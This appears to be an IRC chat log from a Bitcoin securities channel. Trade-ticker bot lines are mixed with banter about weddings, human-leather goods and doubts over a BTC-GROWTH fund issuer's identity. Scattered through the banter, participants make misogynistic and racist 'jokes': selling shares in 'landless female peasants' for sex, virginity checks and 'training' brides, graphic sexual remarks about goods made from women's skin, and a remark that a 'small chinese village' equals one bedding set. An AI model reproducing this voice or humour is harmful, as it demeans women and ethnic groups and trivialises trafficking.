i think composting biomass for hot water is one of the most efficient ways to get hot water for cost. Haven't had the space to try it yet. Aug 15 17:37:40 still very intersted in the tech, no time to jump in anymore though. Aug 15 17:37:51 [BTCTC] [LABCOIN] 235 @ 0.001623 = 0.3814 BTC [-] Aug 15 17:38:24 [BTCTC] [ACTIVEMINING] 9 @ 0.005215 = 0.0469 BTC [+] Aug 15 17:38:25 even so, in order to get a mw from it it takes some mass... Aug 15 17:39:12 [BTCTC] [LABCOIN] 235 @ 0.001624 = 0.3816 BTC [+] Aug 15 17:39:41 i want every single one of those 0.5 casascius silvers w/ the old holo Aug 15 17:40:25 [BTCTC] [LABCOIN] 235 @ 0.00165 = 0.3878 BTC [+] Aug 15 17:41:00 mircea_popescu, i would love to see a full scale biomass operation, although i would not want to smell it. Aug 15 17:41:21 [BTCTC] [LABCOIN] 235 @ 0.001623 = 0.3814 BTC [-] Aug 15 17:41:36 [HAVELOCK] [XBOND] 6000 @ 0.00105 = 6.3 BTC [+] Aug 15 17:41:55 you'd have to filter the gases anyway, due to regulations Aug 15 17:42:08 so not much smell Aug 15 17:42:09 [HAVELOCK] [XBOND] 505 @ 0.00105 = 0.5303 BTC [+] Aug 15 17:42:31 [BTCTC] [LABCOIN] 235 @ 0.001647 = 0.387 BTC [+] Aug 15 17:42:33 [10:34:37] when i lived in SK, they had an amazing recycling program Aug 15 17:42:41 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [-] Aug 15 17:42:44 there are three important businesses that will always be in business and wildly profitable Aug 15 17:42:59 [BTCTC] [LABCOIN] 25 @ 0.001674 = 0.0419 BTC [+] Aug 15 17:43:13 garbage, funerals, and... Aug 15 17:43:22 bulk freight transport, waste management, and food. Aug 15 17:43:35 heh. make it 4 instead of 3 Aug 15 17:43:37 nubbins`: no, even funerals will eventually be obsolete Aug 15 17:43:44 [BTCTC] [LABCOIN] 235 @ 0.001623 = 0.3814 BTC [-] Aug 15 17:43:45 they may cure death in my lifetime. Aug 15 17:43:46 -_- Aug 15 17:43:53 no gambling or liquor businesses D3? :P Aug 15 17:44:02 Duffer1: I do not believe in them. Aug 15 17:44:07 they may cure waste, too ;) Aug 15 17:44:19 lol that won't stop them from existing Aug 15 17:44:30 Duffer1: no, but I wont invest in them. Aug 15 17:44:37 ah i see Aug 15 17:44:41 [BTCTC] [LABCOIN] 85 @ 0.001645 = 0.1398 BTC [+] Aug 15 17:44:48 bulk freight transport would be the first to die Aug 15 17:45:31 well, maybe not. i was thinking food transport Aug 15 17:47:28 [BTCTC] [LABCOIN] 13 @ 0.001672 = 0.0217 BTC [+] Aug 15 17:47:29 [BTCTC] [LABCOIN] 1 @ 0.001673 BTC [+] Aug 15 17:47:30 [BTCTC] [LABCOIN] 3 @ 0.001674 = 0.005 BTC [+] Aug 15 17:47:35 ;;seen ThickAsThieves Aug 15 17:47:36 ThickAsThieves was last seen in #bitcoin-assets 17 minutes and 48 seconds ago: i am on a list for similar Aug 15 17:48:49 deadweasel jurov i thought they use the methane/etc Aug 15 17:49:13 [BTCTC] [ASICMINER-PT] 1 @ 3.838 BTC [-] Aug 15 17:49:26 [HAVELOCK] [XBOND] 1 @ 0.00105 BTC [+] Aug 15 17:49:38 [BTCTC] [ASICMINER-PT] 1 @ 3.928 BTC [+] Aug 15 17:51:29 [BTCTC] [DMS.MINING] 1 @ 0.0029 BTC [-] Aug 15 17:52:31 [MPEX] [S.MPOE] 9632 @ 0.00086124 = 8.2955 BTC [+] Aug 15 17:53:19 you're right, they do. Aug 15 17:53:28 nubbins, you forgot weddings. Aug 15 17:53:39 that's my family business. Aug 15 17:53:44 i'm not in it, but it's HIGHLY profitable. Aug 15 17:54:07 Do the finest, highest class weddings, charge 50-150K each, for one day. Aug 15 17:54:20 [BTCTC] [BTC-GROWTH] 15 @ 0.1 = 1.5 BTC [-] Aug 15 17:54:21 on a beautiful property you build near rich people. Aug 15 17:54:50 Just don't do so in Houston, Dallas, Or Atlanta, you will be crushed. Aug 15 17:54:51 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [-] Aug 15 17:55:02 ;) Aug 15 17:58:48 [HAVELOCK] [AM100] 4 @ 0.0387999 = 0.1552 BTC [-] Aug 15 17:59:43 my wedding cost $700, including rings Aug 15 17:59:50 it was awesome Aug 15 18:00:07 but yes, it's crazy how much people spend on them Aug 15 18:00:57 one of my artists does wedding bouquets on the side, and she said it's actually insane how much money people spend on just flowers Aug 15 18:02:38 brb, packing coins for mailing Aug 15 18:04:17 nubbins, you did your wedding right. We make gobs off of the 'wedding' conditioning of rich girls. If it's broke and you can't fix it, you might as well profit. Aug 15 18:04:39 yeah Aug 15 18:04:47 if I ever get married, we're not having a wedding Aug 15 18:05:02 lol Aug 15 18:05:09 I refuse to be part of such a scam Aug 15 18:05:33 if two people really love each other, they dont need some several thousand dollar ceremony to prove it to other people Aug 15 18:07:07 I refuse not to profit from it. Aug 15 18:07:12 weddings usually came with a dowry Aug 15 18:07:38 [BTCTC] [LABCOIN] 85 @ 0.001639 = 0.1393 BTC [-] Aug 15 18:07:39 [BTCTC] [LABCOIN] 3 @ 0.00164 = 0.0049 BTC [+] Aug 15 18:07:41 [BTCTC] [LABCOIN] 20 @ 0.001642 = 0.0328 BTC [+] Aug 15 18:07:42 [BTCTC] [LABCOIN] 6 @ 0.001659 = 0.01 BTC [+] Aug 15 18:07:43 [BTCTC] [LABCOIN] 100 @ 0.00166 = 0.166 BTC [+] Aug 15 18:08:23 [BTCTC] [DMS.PURCHASE] 47 @ 0.02079 = 0.9771 BTC [+] Aug 15 18:08:28 Is anyone selling brides for btc yet? Aug 15 18:09:19 TAT, do a brides PT. Collect landless female peasants across the globe and sell shares of it. One share = one house cleaning or BJ. Aug 15 18:10:43 that would be pretty cool Aug 15 18:11:28 Diablo-D3: i think it's not necessary a proof of love, but something similar like birthday parties or funeral ceremonies Aug 15 18:12:24 I dont do birthdays or funerals either. Aug 15 18:13:36 you should try it from time to time, it's fun ;) Aug 15 18:13:48 agreed, it's all a farce, distractions abound in a sick world. Aug 15 18:14:13 dexX7: we only are on this planet for so long, why waste it doing shit that doesnt matter Aug 15 18:14:20 ^^^^^ Aug 15 18:14:57 hey, am i the only godfather here ? Aug 15 18:15:24 of the romanian mob? Aug 15 18:15:55 [BTCTC] [BTC-GROWTH] 725 @ 0.098 = 71.05 BTC [-] Aug 15 18:15:59 no, no, of some married couple Aug 15 18:20:24 I am Godfather to my niece. Aug 15 18:20:40 i hope that never comes to pass. Aug 15 18:21:20 well not to baptisms, to weddings i meant Aug 15 18:21:45 so you take care of the couple if they become invalids? Aug 15 18:21:56 sounds crappy. Aug 15 18:22:03 well historically you stick your finger in the bride to make sure she's no slut Aug 15 18:22:11 but that's obsolete, as who the fuck marries a virgin these days Aug 15 18:22:12 [BTCTC] [BTC-GROWTH] 500 @ 0.1 = 50 BTC [+] Aug 15 18:22:20 that's right! that's some old shit tho -- i think not anymore, unless Islamic. Aug 15 18:22:31 They still check. Aug 15 18:22:34 freaky. Aug 15 18:22:51 who wants to take the time to train a virgin? Aug 15 18:23:11 i dont think defloration makes one more apt to train tbh Aug 15 18:23:25 [BTCTC] [BASIC-MINING] 1 @ 0.2954 BTC [-] Aug 15 18:23:26 [BTCTC] [BASIC-MINING] 10 @ 0.2953 = 2.953 BTC [-] Aug 15 18:23:28 [BTCTC] [BASIC-MINING] 3 @ 0.2923 = 0.8769 BTC [-] Aug 15 18:23:29 [BTCTC] [BASIC-MINING] 6 @ 0.2922 = 1.7532 BTC [-] Aug 15 18:26:11 defloration demands *some experience. at least not start from zero with a cucumber and melon explaining how it works. then you have to teach BJs and what not. PITA. Aug 15 18:26:41 [BTCTC] [BTC-GROWTH] 44 @ 0.1 = 4.4 BTC [+] Aug 15 18:26:52 is MPOE-PR rich yet? Aug 15 18:26:56 :P Aug 15 18:27:17 A workers’ center based in New York City that uses protests and other union-organizing tactics to push for an increase in the minimum wage was sued by some of its own employees. Aug 15 18:27:20 guess the reason Aug 15 18:27:48 deadweasel i imagine she's doing pretty well but prolly not old enough yet Aug 15 18:27:49 collusion? Aug 15 18:27:53 [BTCTC] [BTC-GROWTH] 1 @ 0.0999 BTC [-] Aug 15 18:27:55 no, they failed to pay salaries. Aug 15 18:28:18 [BTCTC] [BTC-GROWTH] 27 @ 0.0999 = 2.6973 BTC [-] Aug 15 18:28:57 probably did it on purpose, there is often someone in the union working for the other side. Aug 15 18:31:29 this is pretty common. politicians not paying their employes, states not following their own work laws, etc. Aug 15 18:32:33 i remember the epic thing a few years ago when california decided to pay everyone it owed money to in ious Aug 15 18:32:39 then refused to take those in tax receipts. Aug 15 18:32:47 somehow, magically, the sec didn't get involved. Aug 15 18:37:35 back! Aug 15 18:37:49 yeah, our wedding was just us, marriage commissioner, and 2 witnesses he provided Aug 15 18:38:03 only way to be fair was to exclude everybody and just party when we got home Aug 15 18:38:41 entire ceremony was 15 minutes Aug 15 18:40:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.04023 BTC [-] Aug 15 18:44:58 [BTCTC] [BTC-GROWTH] 2 @ 0.09801 = 0.196 BTC [-] Aug 15 18:44:59 [BTCTC] [BTC-GROWTH] 96 @ 0.098 = 9.408 BTC [-] Aug 15 18:45:29 [BTCTC] [DMS.PURCHASE] 1000 @ 0.02079 = 20.79 BTC [+] Aug 15 18:45:35 [BTCTC] [ACTIVEMINING] 30 @ 0.00517 = 0.1551 BTC [-] Aug 15 18:45:37 [BTCTC] [ACTIVEMINING] 2 @ 0.005171 = 0.0103 BTC [+] Aug 15 18:48:21 http://www.humanleather.co.uk/humanleatherproducts.html Aug 15 18:48:23 Human Leather Exclusive Products - Exquisite Wallets, Belts, Shoes Aug 15 18:48:23 this should ipo Aug 15 18:48:55 omg lol Aug 15 18:49:29 [HAVELOCK] [HIM] 2 @ 0.20889 = 0.4178 BTC [-] Aug 15 18:50:44 human leather wallet, 140 BTC Aug 15 18:50:51 i dunno, i'd wanna see the human Aug 15 18:51:01 suppose your wallet had psoriasis, or weird freckles Aug 15 18:51:22 did its put the lotion on its skin to avoid getting the hose again? these are questions savy investors want to know Aug 15 18:51:48 i was doing some leather working last night Aug 15 18:51:52 [BTCTC] [BASIC-MINING] 6 @ 0.3123 = 1.8738 BTC [+] Aug 15 18:52:25 [BTCTC] [BASIC-MINING] 1 @ 0.3127 BTC [+] Aug 15 18:52:31 lol Aug 15 18:52:31 dog needed new collar. got the dremel tool Aug 15 18:52:33 i find this morbidly fascinating Aug 15 18:52:34 WOW, no human leather wallet for me Aug 15 18:52:49 I already don't like peoplemuch anyway Aug 15 18:52:50 https://lh5.googleusercontent.com/-1ucOQPj_6vg/Ugz0DcEGPyI/AAAAAAAASPc/iA_lqHkqUvM/w879-h660-no/IMG_20130815_080041_161.jpg Aug 15 18:52:51 apparently they pay handsomely for your hide Aug 15 18:52:58 human leather underpants = permanent handjob Aug 15 18:53:00 [BTCTC] [BASIC-MINING] 4 @ 0.314 = 1.256 BTC [+] Aug 15 18:53:04 haha Aug 15 18:53:20 tighty-whitey underwear made from hand skin Aug 15 18:53:33 racist. Aug 15 18:53:33 lol, better make sure it is female skin Aug 15 18:53:38 no homo stuff here Aug 15 18:53:38 or would they just cut the action zone out of a female's crotch Aug 15 18:53:40 tighty-browny Aug 15 18:53:59 stick your cock thru the vag-hole Aug 15 18:54:08 incidentally, considering how smooth cunt is i could go for a human labia pillow or something Aug 15 18:54:25 you'd want droopy labia Aug 15 18:54:28 less seams Aug 15 18:54:34 [HAVELOCK] [HIM] 1 @ 0.2089 BTC [+] Aug 15 18:54:35 :( Aug 15 18:55:00 They would have to make it out of a really fat girl Aug 15 18:55:04 :( Aug 15 18:55:07 altho we all know nut sack would provide the finest leather Aug 15 18:55:17 drinking flask Aug 15 18:55:19 think about it Aug 15 18:55:54 Hollywood obviously you'd use multiple pairs of lips. Aug 15 18:56:08 small chinese village = 1 bedding set. Aug 15 18:56:13 heh Aug 15 18:57:06 i knew a guy years ago who claimed to be in the business of trading human parts Aug 15 18:57:14 [BTCTC] [DMS.SELLING] 100 @ 0.01783 = 1.783 BTC [-] Aug 15 18:57:15 he had a real fascination with deformed skulls Aug 15 18:57:16 [BTCTC] [DMS.SELLING] 270 @ 0.01782 = 4.8114 BTC [-] Aug 15 18:57:20 newborn eyelid football. Aug 15 18:57:57 so soft! Aug 15 18:58:46 [BTCTC] [ASICMINER-PT] 1 @ 3.921 BTC [-] Aug 15 18:58:47 [BTCTC] [ASICMINER-PT] 2 @ 3.922 = 7.844 BTC [+] Aug 15 19:00:19 [BTCTC] [BASIC-MINING] 1 @ 0.3173 BTC [+] Aug 15 19:00:49 [BTCTC] [TAT.ASICMINER] 4 @ 0.04019 = 0.1608 BTC [-] Aug 15 19:00:55 [BTCTC] [BASIC-MINING] 5 @ 0.3174 = 1.587 BTC [+] Aug 15 19:01:08 ;; ticker havelock cfig Aug 15 19:01:08 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX] [--market mtgox|btce|bitstamp]) -- Return pretty-printed ticker. Default market is Mtgox. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure (1 more message) Aug 15 19:01:36 ? Aug 15 19:01:39 one of those fancy neck pillows made out of ass cheek Aug 15 19:01:41 [BTCTC] [DMS.SELLING] 30 @ 0.01814 = 0.5442 BTC [+] Aug 15 19:02:01 Duffer1: !ticker Aug 15 19:02:12 oh duh thanks Aug 15 19:02:20 !ticker havelock cfig Aug 15 19:02:21 [HAVELOCK:CFIG] 1D: 0.15000000 / 0.15 / 0.15000000 (157 shares, 23.55000000 BTC), 7D: 0.15000000 / 0.15 / 0.15000000 (2662 shares, 399.30000000 BTC), 30D: 0.15000000 / 0.15 / 0.15000000 (2662 shares, 399.30000000 BTC) Aug 15 19:02:29 ;;ticker Aug 15 19:02:30 MtGox BTCUSD ticker | Best bid: 111.11000, Best ask: 111.40479, Bid-ask spread: 0.29479, Last trade: 111.11000, 24 hour volume: 23621.10028024, 24 hour low: 109.00000, 24 hour high: 115.00000, 24 hour vwap: 112.68007 Aug 15 19:03:43 [BTCTC] [BTC-BOND] 2000 @ 0.009997 = 19.994 BTC [-] Aug 15 19:04:38 The human leather folks really should accept BTC to protect their highly discerning clients... Aug 15 19:05:00 [BTCTC] [DMS.SELLING] 5 @ 0.01815 = 0.0908 BTC [+] Aug 15 19:05:01 [HAVELOCK] [XBOND] 3 @ 0.00107 = 0.0032 BTC [+] Aug 15 19:05:14 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.000971 = 0.0107 BTC [-] Aug 15 19:05:17 [BTCTC] [DMS.MINING] 5 @ 0.0029 = 0.0145 BTC [-] Aug 15 19:05:24 suppose they only accept skin as payment? Aug 15 19:05:31 submit a back, get a wallet Aug 15 19:05:33 [HAVELOCK] [CFIG] 13 @ 0.15 = 1.95 BTC Aug 15 19:05:43 [BTCTC] [DMS.MINING] 4 @ 0.0029 = 0.0116 BTC [-] Aug 15 19:05:49 wait, the grocery store doesn't take skin Aug 15 19:05:50 n/m Aug 15 19:07:07 [BTCTC] [DMS.MINING] 6 @ 0.0029 = 0.0174 BTC [-] Aug 15 19:07:29 Duffer1 !t Aug 15 19:07:50 a nm Aug 15 19:07:59 thanks ^.^ Aug 15 19:08:48 [HAVELOCK] [XBOND] 3 @ 0.00107 = 0.0032 BTC [+] Aug 15 19:08:56 [BTCTC] [DMS.MINING] 2 @ 0.0029 = 0.0058 BTC [-] Aug 15 19:09:10 In fact, we have had to turn away some potential donors, as we can accept only the highest quality human skin. Aug 15 19:09:27 maintain your skin, it pays off :D Aug 15 19:09:38 your relatives will thank you Aug 15 19:09:50 i wonder if anyone's donated skin from their living body Aug 15 19:09:59 and just gotten a graft Aug 15 19:10:33 certainly yes, very fat people have too much skin after liposuction Aug 15 19:10:55 there was a big stink kicked up here a few months ago Aug 15 19:11:09 a few REALLY fat people lost a LOT of weight (like 100kg+) Aug 15 19:11:18 and wanted the gov't to pay for excess skin removal Aug 15 19:11:25 but the gov't wouldn't do it Aug 15 19:11:34 lmao Aug 15 19:11:43 this should be integrated services. Aug 15 19:11:54 "come in a fat woman, leave a skinny chick with a new purse and shoes" Aug 15 19:12:03 [MPEX] [S.MPOE] 7597 @ 0.00086143 = 6.5443 BTC [+] Aug 15 19:12:12 "matching accessories with each surgery" Aug 15 19:12:14 [BTCTC] [BTC-GROWTH] 2 @ 0.09979 = 0.1996 BTC [+] Aug 15 19:12:15 [BTCTC] [BTC-GROWTH] 11 @ 0.0998 = 1.0978 BTC [+] Aug 15 19:12:15 [BTCTC] [BTC-GROWTH] 296 @ 0.0999 = 29.5704 BTC [+] Aug 15 19:12:32 get floating ribs removed, turn them into a lovely necklace Aug 15 19:12:36 or a small xylophone Aug 15 19:12:42 lol Aug 15 19:12:50 um, in my case it would be a fur instead of skin =P Aug 15 19:13:11 no sweat, put it on your wall like a bear skin Aug 15 19:13:13 tanning gets rid of the hair Aug 15 19:13:31 i went to a tannery in morocco once. rotten place Aug 15 19:13:56 they were kind enough to give me a sprig of mint leaves to hold under my nose Aug 15 19:14:17 jurov, the other kind of tanning :P Aug 15 19:14:37 they're not that different Aug 15 19:14:49 lol yeah Aug 15 19:14:57 i'm just now wondering whether they share the same origin Aug 15 19:15:28 [HAVELOCK] [AM100] 1 @ 0.03810001 BTC [-] Aug 15 19:16:17 wow, goes all the way back to Sanskrit Aug 15 19:16:51 Verb from Middle English tannen, from late Old English tannian (“to tan a hide”), from Anglo-Norman tanner, from tan. Aug 15 19:16:56 so there ya go Aug 15 19:17:25 [BTCTC] [DMS.MINING] 82 @ 0.0029 = 0.2378 BTC [-] Aug 15 19:17:36 centuries later, people pay money for the privilege of standing in front of lamps that mummify your skin Aug 15 19:17:50 far cry from using leeches, hey? Aug 15 19:17:54 I don't understand tanning Aug 15 19:17:58 it's ugly Aug 15 19:17:59 [BTCTC] [DMS.MINING] 2 @ 0.00292 = 0.0058 BTC [+] Aug 15 19:18:01 we use different words for these Aug 15 19:18:02 and bad for your health Aug 15 19:18:02 [BTCTC] [DMS.MINING] 77 @ 0.00292 = 0.2248 BTC [+] Aug 15 19:18:24 [BTCTC] [DMS.MINING] 44 @ 0.00295 = 0.1298 BTC [+] Aug 15 19:18:27 everything is bad for your health, but tanning makes you look aged Aug 15 19:18:32 when I see tan people, I see diseased skin Aug 15 19:19:51 [BTCTC] [LABCOIN] 20 @ 0.001687 = 0.0337 BTC [+] Aug 15 19:19:53 [BTCTC] [LABCOIN] 1 @ 0.001688 BTC [+] Aug 15 19:19:54 yes, there has to be a film where death character is fully tanned Aug 15 19:20:10 plus, white skin can do that http://i.imgur.com/0dGJiCs.jpg Aug 15 19:20:27 [BTCTC] [LABCOIN] 50 @ 0.001709 = 0.0855 BTC [+] Aug 15 19:20:57 heh Aug 15 19:22:04 [BTCTC] [CRYPTO-TRADE] 1 @ 0.196 BTC [-] Aug 15 19:22:37 it's mildly funny that in every country i've visited, people try so hard to have pale skin Aug 15 19:22:40 except for white people Aug 15 19:22:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.04015 = 0.0803 BTC [-] Aug 15 19:22:45 who want their skin to be darker Aug 15 19:23:00 they used to bleach their faces in SK Aug 15 19:24:19 [HAVELOCK] [SMG] 1 @ 0.00019 BTC [-] Aug 15 19:24:42 [BTCTC] [ACTIVEMINING] 3 @ 0.005169 = 0.0155 BTC [-] Aug 15 19:24:48 http://hpmor.com/chapter/97 yay Aug 15 19:24:53 Harry Potter and the Methods of Rationality, Chapter 97: Roles, Pt 8 Aug 15 19:25:52 jurov: yeah I just found that out Aug 15 19:25:54 havent read it yet Aug 15 19:26:11 [BTCTC] [BTC-GROWTH] 50 @ 0.0999 = 4.995 BTC [+] Aug 15 19:27:35 [BTCTC] [DMS.MINING] 10 @ 0.0029 = 0.029 BTC [-] Aug 15 19:27:55 [BTCTC] [ACTIVEMINING] 30 @ 0.005167 = 0.155 BTC [-] Aug 15 19:28:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.04013 = 0.1204 BTC [-] Aug 15 19:28:58 [BTCTC] [LABCOIN] 1 @ 0.001707 BTC [-] Aug 15 19:29:53 [BTCTC] [ACTIVEMINING] 2 @ 0.005166 = 0.0103 BTC [-] Aug 15 19:29:54 [BTCTC] [ACTIVEMINING] 2 @ 0.005299 = 0.0106 BTC [+] Aug 15 19:29:56 [BTCTC] [ACTIVEMINING] 3 @ 0.0053 = 0.0159 BTC [+] Aug 15 19:30:03 [BTCTC] [BTC-GROWTH] 351 @ 0.0999 = 35.0649 BTC [+] Aug 15 19:30:05 [BTCTC] [BTC-GROWTH] 149 @ 0.1 = 14.9 BTC [+] Aug 15 19:30:20 [BTCTC] [LTC-ATF.B2] 4 @ 0.0103 = 0.0412 BTC [-] Aug 15 19:37:58 [BTCTC] [DMS.MINING] 100 @ 0.00294 = 0.294 BTC [+] Aug 15 19:38:18 [BTCTC] [DMS.MINING] 15 @ 0.00295 = 0.0443 BTC [+] Aug 15 19:38:28 [BTCTC] [DMS.MINING] 450 @ 0.002957 = 1.3307 BTC [+] Aug 15 19:38:28 [BTCTC] [DMS.MINING] 344 @ 0.002958 = 1.0176 BTC [+] Aug 15 19:38:30 [BTCTC] [DMS.MINING] 4 @ 0.002958 = 0.0118 BTC [+] Aug 15 19:38:56 [BTCTC] [DMS.MINING] 4 @ 0.002959 = 0.0118 BTC [+] Aug 15 19:39:59 [BTCTC] [ACTIVEMINING] 30 @ 0.005116 = 0.1535 BTC [-] Aug 15 19:40:01 [BTCTC] [ACTIVEMINING] 30 @ 0.005262 = 0.1579 BTC [+] Aug 15 19:40:02 [BTCTC] [ACTIVEMINING] 68 @ 0.005263 = 0.3579 BTC [+] Aug 15 19:40:08 [HAVELOCK] [AM1] 2 @ 4.09 = 8.18 BTC [+] Aug 15 19:40:29 [BTCTC] [DMS.MINING] 845 @ 0.002959 = 2.5004 BTC [+] Aug 15 19:40:52 What the heck is BTC-GROWTH Aug 15 19:41:00 some book Aug 15 19:41:09 a fund for publishing a book Aug 15 19:41:16 [BTCTC] [BTC-GROWTH] 1 @ 0.0999 BTC [-] Aug 15 19:41:25 No, that's another thing Aug 15 19:41:44 [BTCTC] [BTC-GROWTH] 3 @ 0.0999 = 0.2997 BTC [-] Aug 15 19:42:04 It's W4A-BOOK Aug 15 19:42:16 I'm talking about BTC-GROWTH Aug 15 19:42:29 Ah yeah Aug 15 19:42:30 sorry Aug 15 19:42:31 lol Aug 15 19:42:32 "whereby the fund issuer will receive an annual management fee of 2% of assets under management and participants share 20% of fund profits with the issuer as a performance fee. Fees will be calculated monthly, with the annual management fee applied on a pro-rata basis; effectively, this translates to 0.17% per month." Aug 15 19:42:41 Well that's some high fees. Aug 15 19:43:42 [HAVELOCK] [XBOND] 3 @ 0.001056 = 0.0032 BTC [-] Aug 15 19:43:55 [HAVELOCK] [XBOND] 40 @ 0.0010536 = 0.0421 BTC [-] Aug 15 19:44:01 depends what one is doing Aug 15 19:44:18 but yeah i can see it in this case Aug 15 19:44:20 [BTCTC] [BASIC-MINING] 7 @ 0.3156 = 2.2092 BTC [-] Aug 15 19:45:35 [BTCTC] [ACTIVEMINING] 2 @ 0.005266 = 0.0105 BTC [+] Aug 15 19:46:32 [BTCTC] [DMS.MINING] 49 @ 0.002925 = 0.1433 BTC [-] Aug 15 19:46:44 [BTCTC] [ACTIVEMINING] 7 @ 0.005119 = 0.0358 BTC [-] Aug 15 19:46:57 [BTCTC] [BTC-GROWTH] 1 @ 0.0999 BTC [-] Aug 15 19:47:50 I have no idea where the demand for BTC-GROWTH is coming from.. everything I've read seems to have a rather lackluster response Aug 15 19:48:27 Ok, so there's btcgrowth.com which has the same design and everything as mulhauser.net/psychologicalinvestor.com, BUT, albeit mulhauser.net links to the other websites of the network, it doesn't link to btcgrowth.com Aug 15 19:48:39 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [+] Aug 15 19:48:51 Was any proof provided the guy is indeed the guy from mulhauser.net? Aug 15 19:49:27 he claims his id was verified by a ltc mod Aug 15 19:49:29 [BTCTC] [DMS.SELLING] 2 @ 0.01815 = 0.0363 BTC [+] Aug 15 19:49:43 Cause copying someone and making a website claiming to be related is as easy as counting to 3... so is making a claim... Aug 15 19:49:44 I don't know. I remember it being asked that he link something on his page as proof, but I didn't read whether he ever did it Aug 15 19:50:13 I can't believe it's raised almost 1500 BTC already Aug 15 19:50:15 [BTCTC] [LABCOIN] 2 @ 0.001681 = 0.0034 BTC [-] Aug 15 19:50:27 [BTCTC] [NASTY-PT] 2 @ 0.00435 = 0.0087 BTC [-] Aug 15 19:50:34 1427 to be precise Aug 15 19:51:02 [BTCTC] [DMS.MINING] 1 @ 0.002959 BTC [+] Aug 15 19:51:45 Namworld in a word, no. Aug 15 19:52:02 [BTCTC] [BTC-TRADING-PT] 10 @ 0.8348 = 8.348 BTC [+] Aug 15 19:52:56 [BTCTC] [DMS.SELLING] 69 @ 0.01815 = 1.2524 BTC [+] Aug 15 19:53:17 [BTCTC] [DMS.MINING] 150 @ 0.002959 = 0.4439 BTC [+] Aug 15 19:53:48 heh. 'my identity has been verified by one of the exchange moderators' Aug 15 19:53:53 [BTCTC] [DMS.MINING] 60 @ 0.00296 = 0.1776 BTC [+] Aug 15 19:53:54 [BTCTC] [DMS.MINING] 200 @ 0.00296 = 0.592 BTC [+] Aug 15 19:53:56 The actual guy has been around long before the Bitcoin era according to domain registration. People seem to like his articles on finances. IF he can provide proofs of who he is, I guess 1500 BTC isn't too ridiculous. Aug 15 19:54:02 As in, 'my identity has been verified by someone who could afford 10 shares of this stock' Aug 15 19:54:15 But an exchange mod is no proof. Aug 15 19:55:00 [BTCTC] [BTC-GROWTH] 3 @ 0.09813 = 0.2944 BTC [-] Aug 15 19:55:02 [BTCTC] [BTC-GROWTH] 50 @ 0.09812 = 4.906 BTC [-] Aug 15 19:55:03 [BTCTC] [BTC-GROWTH] 10 @ 0.0981 = 0.981 BTC [-] Aug 15 19:55:04 [BTCTC] [BTC-GROWTH] 84 @ 0.0981 = 8.2404 BTC [-] Aug 15 19:55:05 Compared to things like BTC-GARDEN/LABCOIN/ActiveMining Aug 15 19:55:14 Which raised far more on nothing Aug 15 19:55:17 If he doesn't understand that an exchange mod is insufficient proof of identity, I'd question his understanding of other parts of the BTC securities market Aug 15 19:55:35 It's either incompetent or willful avoidance Aug 15 19:55:53 what would you accept as proof of id? Aug 15 19:55:58 [BTCTC] [DMS.MINING] 3 @ 0.0029 = 0.0087 BTC [-] Aug 15 19:56:00 [BTCTC] [DMS.SELLING] 3 @ 0.01815 = 0.0545 BTC [+] Aug 15 19:56:08 [BTCTC] [DMS.PURCHASE] 3 @ 0.0208 = 0.0624 BTC [+] Aug 15 19:56:28 Some method of verifying his long standing accounts. A post from his official page Aug 15 19:56:46 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [+] Aug 15 19:57:12 [BTCTC] [DMS.SELLING] 28 @ 0.01815 = 0.5082 BTC [+] Aug 15 19:57:44 1LvCuntsJyFFQsLuJhBXBPokbQa7SAyMr4 Aug 15 19:57:54 did someone get a vanity "lvl 1 cunts" btc addy ?! Aug 15 19:58:13 [BTCTC] [DMS.PURCHASE] 3 @ 0.0208 = 0.0624 BTC [+] Aug 15 19:58:20 hehe Aug 15 19:58:53 dexX7 it's trivial to verify you're X if x is well known. Aug 15 19:58:54 [HAVELOCK] [AM100] 1 @ 0.03810001 BTC [-] Aug 15 19:58:56 pankkake parseval pigeons pizzaman1337 Populus PsychoticBoy publio Pucilowski Aug 15 19:59:02 [BTCTC] [BTC-GROWTH] 20 @ 0.099 = 1.98 BTC [-] Aug 15 19:59:05 http://psychologicalinvestor.com/lib/real-markets/bitcoin-derivatives-liquidity-counterparty-risk-134/ MPEx completely avoided Aug 15 19:59:06 as parseval says, make a post on your well known blog sayibng hey it's me Aug 15 19:59:07 etc Aug 15 19:59:07 Bitcoin Derivatives, Liquidity and Counterparty Risk Aug 15 19:59:30 [HAVELOCK] [AM100] 1 @ 0.03810001 BTC [-] Aug 15 19:59:30 jurov lol who's "psychological investor" Aug 15 19:59:55 [BTCTC] [DMS.MINING] 28 @ 0.00288 = 0.0806 BTC [-] Aug 15 19:59:57 [BTCTC] [DMS.MINING] 3 @ 0.00288 = 0.0086 BTC [-] Aug 15 20:00:52 so he is a doctor / investment manager? Aug 15 20:01:07 [HAVELOCK] [XBOND] 1 @ 0.0010699 BTC [+] Aug 15 20:01:22 Dr Greg Mulhauser, BA, PhD, DipCouns, FRSA Aug 15 20:02:06 [HAVELOCK] [XBOND] 25 @ 0.00107 = 0.0268 BTC [+] Aug 15 20:02:18 http://mytherapist.com/greg/about-counsellor.html Aug 15 20:02:20 this guy ?! Aug 15 20:02:21 About Online Therapist Dr Greg Mulhauser Aug 15 20:02:21 [HAVELOCK] [XBOND] 10 @ 0.00107 = 0.0107 BTC [+] Aug 15 20:02:35 [HAVELOCK] [XBOND] 5 @ 0.00107 = 0.0054 BTC [+] Aug 15 20:02:35 same pic. Aug 15 20:02:49 [HAVELOCK] [XBOND] 4 @ 0.00107 = 0.0043 BTC [+] Aug 15 20:03:27 well it could be simple cluelessness. Aug 15 20:04:16 "Originally employed as a research scientist in cognition, complex systems and biologically inspired computation, Dr Greg Mulhauser later moved to business strategy roles and advised on corporate venturing and M&A projects. With educational background in mathematics, philosophy, and mental health, he has worked at the Pentagon, UK universities, and telecommunications giant BT." Aug 15 20:04:17 [HAVELOCK] [XBOND] 664 @ 0.0010581 = 0.7026 BTC [-] Aug 15 20:04:18 should be him Aug 15 20:04:26 [HAVELOCK] [XBOND] 1 @ 0.001058 